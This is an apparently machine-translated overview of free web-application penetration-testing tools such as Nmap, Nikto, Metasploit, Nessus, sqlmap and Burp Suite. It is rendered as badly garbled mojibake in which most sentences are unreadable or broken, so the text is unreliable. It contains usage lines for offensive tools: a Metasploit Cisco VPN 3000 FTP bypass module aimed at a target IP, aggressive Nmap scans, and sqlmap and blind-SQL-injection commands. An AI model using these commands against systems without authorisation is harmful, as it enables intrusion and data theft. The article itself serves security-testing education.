å°ãåã«æžããŸãããã
ç¡æã® Web ã¢ããªã±ãŒã·ã§ã³ Pentester ããŒã«
ãã®èšäºã§ã¯ãããã©ã㯠ããã¯ã¹ãæŠç¥ã䜿çšãã Web ã¢ããªã±ãŒã·ã§ã³ã®ãããã¬ãŒã·ã§ã³ ãã¹ã (䟵å
¥ãã¹ã) ã«æã人æ°ã®ããããŒã«ã«ã€ããŠèª¬æããŸãã
ãããè¡ãããã«ããã®çš®ã®ãã¹ãã«åœ¹ç«ã€ãŠãŒãã£ãªãã£ãèŠãŠãããŸãã 次ã®è£œåã«ããŽãªãèæ
®ããŠãã ããã
- ãããã¯ãŒã¯ã¹ãã£ããŒ
- Web ã¹ã¯ãªãã䟵害ã¹ãã£ããŒ
- æŸå
- 泚å°ã®èªåå
- ãããã¬ãŒ (ã¹ããã¡ãŒãããŒã«ã« ãããã·ãªã©)
ååã«ãã£ãŠã¯æ®éçãªãåæ§ããæã£ãŠãããã®ããããŸãã®ã§ããã®ã«ããŽãªãŒã«åé¡ãããŠããã ããŸããПããè¯ãçµæãåŸãããŸãïŒäž»èŠ³çãªæèŠïŒã
ãããã¯ãŒã¯ã¹ãã£ããŒã
äž»ãªã¿ã¹ã¯ã¯ãå©çšå¯èœãªãããã¯ãŒã¯ ãµãŒãã¹ãæ€åºãããã®ããŒãžã§ã³ãã€ã³ã¹ããŒã«ããOS ã決å®ããããšãªã©ã§ãã
Nmapã®
ããã¯åãªããã¹ããŒããã¹ãã£ãã§ã¯ãªããæ¬æ Œçãªæ¡åŒµå¯èœãªããŒã«ã§ã (ãçããæ©èœãã® XNUMX ã€ã¯ãããŒãã«ã¯ãŒã ãååšãããã©ããããã§ãã¯ããã¹ã¯ãªããã®ååšã§ãã
nmap -A -T4 localhost
-A OS ããŒãžã§ã³ã®æ€åºãã¹ã¯ãªããã®ã¹ãã£ã³ããã³ãã¬ãŒã¹çš
-T4 æéå¶åŸ¡èšå® (0 ãã 5 ãŸã§ãå€ãã»ã©éããªããŸã)
localhost - ã¿ãŒã²ãããã¹ã
ãã£ãšå³ãããã®ã¯ãããŸããïŒ
nmap -sS -sU -T4 -A -v -PE -PP -PS21,22,23,25,80,113,31339 -PA80,113,443,10042 -PO --script all localhost
ããã¯ãZenmap ã®ãäœéå
æ¬ã¹ãã£ã³ããããã¡ã€ã«ã®ãªãã·ã§ã³ã®ã»ããã§ãã å®äºãŸã§ã«ããªãã®æéãããããŸãããæçµçã«ã¯ã¿ãŒã²ãã ã·ã¹ãã ã«ã€ããŠç¥ãããšãã§ãããã詳现ãªæ
å ±ãåŸãããŸãã
Nmap ã¯ãLinux JournalãInfo WorldãLinuxQuestions.OrgãCodetalker Digest ãªã©ã®éèªãã³ãã¥ããã£ãããSecurity Product of the Yearãã¹ããŒã¿ã¹ãåè³ããŠããŸãã
èå³æ·±ãç¹ãšããŠãNmap ã¯æ ç»ããããªãã¯ã¹ ãªããŒããããããã〠ããŒã 4ãããããŒã³ ã¢ã«ãã£ã¡ã€ã¿ã ãããããã¿ããããã
IP-ããŒã«
ããŒã ã¹ãã£ããŒãå
±æãªãœãŒã¹ (å
±æããªã³ã¿ãŒ/ãã©ã«ããŒ)ãWhoIs/Finger/LookupãTelnet ã¯ã©ã€ã¢ã³ããªã©ã 䟿å©ã§é«éãªæ©èœçãªããŒã«ã§ãã
ãã®åéã«ã¯å€ãã®ãŠãŒãã£ãªãã£ãããããããã¯ãã¹ãŠåæ§ã®åäœåçãšæ©èœãåããŠãããããä»ã®è£œåãæ€èšããããšã«ç¹ã«æå³ã¯ãããŸããã ããã§ããnmap ãäŸç¶ãšããŠæãäžè¬çã«äœ¿çšãããŠããŸãã
Web ã¹ã¯ãªãã䟵害ã¹ãã£ããŒ
äžè¬çãªèåŒ±æ§ (SQL injãXSSãLFI/RFI ãªã©) ãŸãã¯ãšã©ãŒ (åé€ãããŠããªãäžæãã¡ã€ã«ããã£ã¬ã¯ããªã®ã€ã³ããã¯ã¹äœæãªã©) ãèŠã€ããããšããŠããŸãã
AcunetixWebè匱æ§ã¹ãã£ããŒ
ã ãã
ããã«ã人æ°ã®ããã¹ã¯ãªãããèŠã€ããå Žåã¯ããªãªãŒã¹ããããšã¯ã¹ããã€ã (ããŒã¿ããŒã¹å
ã«ãã) ããªããã©ããããã§ãã¯ããŸãã
PUT ã TRACE ãªã©ãå©çšå¯èœãªãäžèŠãªãã¡ãœãããã¬ããŒãããŸã
çã
ã ç£æ»å¡ãšããŠåããŠããŠãWeb ãµã€ããæ¯æ¥åæããŠããå Žåãããã¯éåžžã«äŸ¿å©ã§ãã
ãã€ãã¹ç¹ã®äžã§ã誀æ€ç¥ã®å²åãé«ãããšã«æ³šç®ããããšæããŸãã ããšãã°ããµã€ã㧠404 ãšã©ãŒãçºçããã¯ãã®ä»£ããã«åžžã«ã¡ã€ã³ ãšã©ãŒã衚瀺ãããå Žåãã¹ãã£ãã¯ãµã€ãã«ããŒã¿ããŒã¹ã®ãã¹ãŠã®ã¹ã¯ãªãããšãã¹ãŠã®è匱æ§ãå«ãŸããŠãããšå€æããŸãã å®éã«ã¯ãããã¯ããã»ã©é »ç¹ã«ã¯èµ·ãããŸããããå®éã«ã¯ããµã€ãã®æ§é ã«å€§ããäŸåããŸãã
å€å
žçãªäœ¿çšæ³:
./nikto.pl -host localhost
ãµã€ãäžã§èªèšŒãå¿ èŠãªå Žåã¯ãnikto.conf ãã¡ã€ã«ã® STATIC-COOKIE å€æ°ã« Cookie ãèšå®ã§ããŸãã
ãŠã£ã¯ã
ã¹ããããã£ãã·ã¥
äžè¬çãªçšé:
ãreportsããã©ã«ãã«ã¯HTML圢åŒã®ã¬ããŒããååšããŸãã
w3af
ãã®å©ç¹ã«ã€ããŠã¯é·ãéèªãããšãã§ããŸãããå®éã«è©ŠããŠã¿ãããšããå§ãããŸã :] ããã䜿çšããäžè¬çãªäœæ¥ã¯ããããã¡ã€ã«ãéžæããç®æšãæå®ããå®éã«èµ·åããããšã«ãªããŸãã
Mantra ã»ãã¥ãªã㣠ãã¬ãŒã ã¯ãŒã¯
Web ã¢ããªã±ãŒã·ã§ã³ããã¹ãŠã®æ®µéã§ãã¹ãããå Žåã«éåžžã«åœ¹ç«ã¡ãŸãã
䜿çšæ¹æ³ã¯ããã©ãŠã¶ã®ã€ã³ã¹ââããŒã«ãšèµ·åã«èŠçŽãããŸãã
å®éããã®ã«ããŽãªã«ã¯å€æ°ã®ãŠãŒãã£ãªãã£ãããããã®äžããç¹å®ã®ãŠãŒãã£ãªãã£ãéžæããã®ã¯éåžžã«å°é£ã§ãã ã»ãšãã©ã®å Žåãåãã³ãã¹ã¿ãŒèªèº«ãå¿ èŠãªããŒã«ã®ã»ããã決å®ããŸãã
æŸå
è匱æ§ã®æªçšãèªååããããã䟿å©ã«è¡ãããã«ãæªçšã¯ãœãããŠã§ã¢ãšã¹ã¯ãªããã§èšè¿°ãããã»ãã¥ãªã㣠ããŒã«ãæªçšããã«ã¯ãã©ã¡ãŒã¿ãæž¡ãã ãã§æžã¿ãŸãã ãŸãããšã¯ã¹ããã€ããæåã§æ€çŽ¢ããå¿ èŠããªããããã®å Žã§é©çšãã補åããããŸãã ãã®ã«ããŽãªãŒã«ã€ããŠã¯ãããã説æããŸãã
ã¡ã¿ã¹ã³ã€ããã¬ãŒã ã¯ãŒã¯
ãããã¯ãå¿ èŠãªãšã¯ã¹ããã€ãã®æäœãåçŽã«èªååããããšãã§ããŸãã äŸãã°ïŒ
msf > use auxiliary/admin/cisco/vpn_3000_ftp_bypass
msf auxiliary(vpn_3000_ftp_bypass) > set RHOST [TARGET IP]
msf auxiliary(vpn_3000_ftp_bypass) > run
å®éããã®ãã¬ãŒã ã¯ãŒã¯ã®æ©èœã¯éåžžã«åºç¯å²ã«ããããããããã«è©³ããç¥ãããå Žåã¯ã次ã®ãµã€ãã«ã¢ã¯ã»ã¹ããŠãã ããã
ã¢ãŒãããŒãž
ã¹ã¯ãªãŒã³ãã£ã¹ã:
Tenable Nessus®
ÐÑпПлÑзПваМОеïŒ
- ããŠã³ããŒã (ã·ã¹ãã çš)ãã€ã³ã¹ããŒã«ãç»é² (ããŒã¯é»åã¡ãŒã«ã«éä¿¡ãããŸã)ã
- ãµãŒããŒãèµ·åãããŠãŒã¶ãŒã Nessus Server Manager ã«è¿œå ããŸãã (ããŠãŒã¶ãŒã®ç®¡çããã¿ã³)
- äœæã«è¡ããŸã
https://localhost:8834/
ãã©ãŠã¶ã§ Flash ã¯ã©ã€ã¢ã³ããååŸããŸã
- [ã¹ãã£ã³] -> [è¿œå ] -> ãã£ãŒã«ãã«å ¥åã (é©åãªã¹ãã£ã³ ãããã¡ã€ã«ãéžæããŠ)ã[ã¹ãã£ã³] ãã¯ãªãã¯ããŸãã
ãã°ãããããšãã¹ãã£ã³ ã¬ããŒãã [ã¬ããŒã] ã¿ãã«è¡šç€ºãããŸãã
ãšã¯ã¹ããã€ãã«å¯ŸãããµãŒãã¹ã®å®è³ªçãªè匱æ§ã確èªããã«ã¯ãäžèšã® Metasploit ãã¬ãŒã ã¯ãŒã¯ã䜿çšãããããšã¯ã¹ããã€ã (ããšãã°ã
ç§èŠïŒããã°ããããŸãã ç§ã¯åœŒããœãããŠã§ã¢æ¥çã®ãã®æ¹åã®ãªãŒããŒã®äžäººãšããŠè¿ãå
¥ããŸããã
泚å°ã®èªåå
Web ã¢ããªã®ã»ãã¥ãªã㣠ã¹ãã£ããŒã®å€ãã¯ã€ã³ãžã§ã¯ã·ã§ã³ãæ€çŽ¢ããŸãããããã§ãåãªãäžè¬çãªã¹ãã£ããŒã§ãã ãŸããã€ã³ãžã§ã¯ã·ã§ã³ã®æ€çŽ¢ãšæªçšã«ç¹åãããŠãŒãã£ãªãã£ããããŸãã ãããããããã«ã€ããŠè©±ããŠãããŸãã
sqlmap
äžè¬çãªäœ¿çšæ³ã¯æ¬¡ã®è¡ã«èŠçŽãããŸãã
python sqlmap.py -u "http://example.com/index.php?action=news&id=1"
ãã·ã¢èªãå«ãååãªããã¥ã¢ã«ããããŸãã ãã®ãœãããŠã§ã¢ã¯ããã³ãã¹ã¿ãŒããã®åéã§äœæ¥ããéã®äœæ¥ã倧å¹
ã«å®¹æã«ããŸãã
å
¬åŒã®ãããªãã¢ãè¿œå ããŸãã
bsqlbf-v2
ãµããŒããããŠããããŒã¿ããŒã¹:
- MS SQL
- MySQL
- PostgreSQL
- ãªã©ã¯ã«
䜿çšäŸïŒ
-url
-ç²ç®ã®ããªã â 泚å
¥çšã®ãã©ã¡ãŒã¿ (ããã©ã«ãã§ã¯ãæåŸã®ãã©ã¡ãŒã¿ãã¢ãã¬ã¹ããŒããååŸãããŸã)
-sql "imformation_schema.tables ãã table_name ãéžæãå¶é 1ããªãã»ãã 0" â ããŒã¿ããŒã¹ã«å¯Ÿããä»»æã®ãªã¯ãšã¹ã
-ããŒã¿ããŒã¹1 â ããŒã¿ããŒã¹ãµãŒããŒ: MSSQL
-ã¿ã€ã1 â æ»æã®çš®é¡ãããã©ã€ã³ããã€ã³ãžã§ã¯ã·ã§ã³ãTrue ããã³ Error (æ§æãšã©ãŒãªã©) å¿çã«åºã¥ã
ãããã¬
ãããã®ããŒã«ã¯ãäž»ã«éçºè ãã³ãŒãã®å®è¡çµæã«åé¡ãããå Žåã«äœ¿çšãããŸãã ãããããã®æ¹åæ§ã¯ãå¿ èŠãªããŒã¿ããã®å Žã§çœ®ãæããããå ¥åãã©ã¡ãŒã¿ãŒã«å¿çããŠäœãè¿ãããããåæãããããããšãã§ããå Žå (ããšãã°ããã¡ãžã³ã°äž) ãªã©ããããã¬ãŒã·ã§ã³ãã¹ãã«ã圹ç«ã¡ãŸãã
ãã£ã·ã¹ã€ãŒã
ç¡æçã«ã¯ä»¥äžãå«ãŸããŸã:
- Burp ãããã·ã¯ããã©ãŠã¶ãããã§ã«çæããããªã¯ãšã¹ããå€æŽã§ããããŒã«ã« ãããã·ã§ãã
- Burp Spider - ã¹ãã€ããŒãæ¢åã®ãã¡ã€ã«ãšãã£ã¬ã¯ããªãæ€çŽ¢ããŸã
- Burp Replyer - HTTP ãªã¯ãšã¹ããæåã§éä¿¡ãã
- Burp Sequencer - ãã©ãŒã å ã®ã©ã³ãã å€ãåæãã
- Burp Decoder ã¯æšæºã®ãšã³ã³ãŒã/ãã³ãŒã (htmlãbase64ãhex ãªã©) ã§ããããã®æ°ã¯æ°åãããã©ã®èšèªã§ãããã«äœæã§ããŸãã
- Burp Comparer - æååæ¯èŒã³ã³ããŒãã³ã
ååãšããŠããã®ããã±ãŒãžã¯ãã®åéã«é¢é£ããã»ãŒãã¹ãŠã®åé¡ã解決ããŸãã
ãã€ãªãªã³åŒŸã
ãããŸã
ãŸãšã
åœç¶ã®ããšãªãããåãã³ãã¹ã¿ãŒã¯ç¬èªã®æŠåšåº«ãšç¬èªã®ãŠãŒãã£ãªãã£ãæã£ãŠããŸãããªããªãããããã¯åçŽã«ããããããããã§ãã æã䟿å©ã§äººæ°ã®ãããã®ãããã€ããªã¹ãããŠã¿ãŸããã ãã ãã誰ãããã®æ¹åã®ä»ã®ãŠãŒãã£ãªãã£ã«æ £ããããšãã§ããããã«ã以äžã«ãªã³ã¯ãæäŸããŸãã
ã¹ãã£ããŒããŠãŒãã£ãªãã£ã®åçš®ããã/ãªã¹ã
ã»ãã¥ãªãã£ããã³ãããã³ã°ããŒã« ããã 100 ãããã¯ãŒã¯ ã»ãã¥ãªã㣠ããŒã« ããã 10 ã® Web è匱æ§ã¹ãã£ã㌠.ããã 10 ã®è匱æ§ã¹ãã£ã㌠OWASP ããã 10 ã®ããŒã«ãšæŠè¡ Web ããŒã¹ã®ã¢ããªã±ãŒã·ã§ã³ ã»ãã¥ãªã㣠ã¹ãã£ã㌠WebAppSec å¥ã® Web ã¢ããªã±ãŒã·ã§ã³ ã»ãã¥ãªã㣠ã¹ãã£ã㌠ãªã¹ã RDot ãã©ãŒã©ã ã® Infosec ãŠãŒãã£ãªã㣠è匱æ§ã¹ãã£ã㌠(Wikipedia)
ããŸããŸãªäŸµå ¥ãã¹ã ãŠãŒãã£ãªãã£ããã§ã«å«ãŸããŠãã Linux ãã£ã¹ããªãã¥ãŒã·ã§ã³
æŽæ°ãã:
PSpider ã«ã€ããŠé»ã£ãŠããããã«ã¯ãããŸããã ã·ã§ã¢ãŠã§ã¢ã§ãããã¬ãã¥ãŒã«ã¯åå ããŠããŸããïŒèšäºã SecLab ã«éã£ããšãã«ç¥ããŸããããå®éã«ã¯ãããåå ã§ïŒç¥èããªããææ°ããŒãžã§ã³ 7.8 ããªãããïŒãèšäºã«ã¯å«ããŸããã§ããïŒã ãããŠçè«çã«ã¯ããã®ã¬ãã¥ãŒãèšç»ãããŠããŸã (ç§ã¯ãã®ããã«é£ãããã¹ããçšæããŠããŸã) ãããããäžçã«æ³šç®ããããã©ããã¯ããããŸããã
PPS èšäºã®äžéšã®å
容ã¯ã次ã®ã¬ããŒãã§æå³ãããç®çã§äœ¿çšãããŸãã
ã¡ãªã¿ã«ããã®èšäºã«é¢ããæèšã¯æ¬¡ã®ãšããã§ãã InfoSec ãªãŒãã³ã㌠(
åºæïŒ habr.com